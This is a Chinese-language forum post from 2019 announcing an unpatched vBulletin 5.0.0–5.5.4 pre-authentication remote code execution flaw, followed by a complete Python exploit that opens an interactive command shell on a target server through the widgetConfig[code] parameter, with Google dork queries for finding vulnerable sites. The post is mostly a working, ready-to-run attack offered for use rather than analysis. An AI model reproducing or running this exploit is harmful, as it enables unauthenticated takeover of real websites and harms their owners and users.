搜索
    Hi~登录注册
    查看: 152|回复: 0
    收起左侧

    vBulletin 0 day PoC

    [复制链接]

    35

    主题

    0

    精华

    18 小时

    在线时间

    新手上路

    Rank: 1

    积分
    28
    发表于 2019-9-30 10:24:53 | 显示全部楼层 |阅读模式
    本帖最后由 黑银研究室_智勤 于 2019-9-30 10:27 AM 编辑

    vBulletin中存在一个远程代码执行漏洞,影响vBulletin v 5.0.0到最新的v 5.5.4版本。

    该漏洞非常严重的原因不仅在于可以远程利用,还在于漏洞利用并不需要认证。

    由于论坛软件包是内部 widget文件通过URL参数接收配置的方式存在漏洞,服务器在分析参数时又没有进行适当的安全检查,
    导致攻击者可以在系统中注入命令,并远程执行代码。

    POC代码参见:https://seclists.org/fulldisclosure/2019/Sep/31
    截至目前,该漏洞还没有被分配CVE编号,同时 vBulletin项目维护人员也没有发布补丁。

    [Python] 纯文本查看 复制代码
    #!/usr/bin/python
    #
    # vBulletin 5.x 0day pre-auth RCE exploit
    #
    # This should work on all versions from 5.0.0 till 5.5.4
    #
    # Google Dorks:
    # - site:*.vbulletin.net
    # - "Powered by vBulletin Version 5.5.4"
     
    import requests
    import sys
     
    if len(sys.argv) != 2:
        sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])
     
    params = {"routestring":"ajax/render/widget_php"}
     
    while True:
         try:
              cmd = raw_input("vBulletin$ ")
              params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
              r = requests.post(url = sys.argv[1], data = params)
              if r.status_code == 200:
                   print r.text
              else:
                   sys.exit("Exploit failed! :(")
         except KeyboardInterrupt:
              sys.exit("\nClosing shell...")
         except Exception, e:
              sys.exit(str(e))





    上一篇:热烈祝贺中华人民共和国成立70周年
    下一篇:版主招募,共建优质氛围交流社区。
    回复

    使用道具 举报

    游客
    回复
    您需要登录后才可以回帖 登录 | 获取账号

    快速回复 返回顶部 返回列表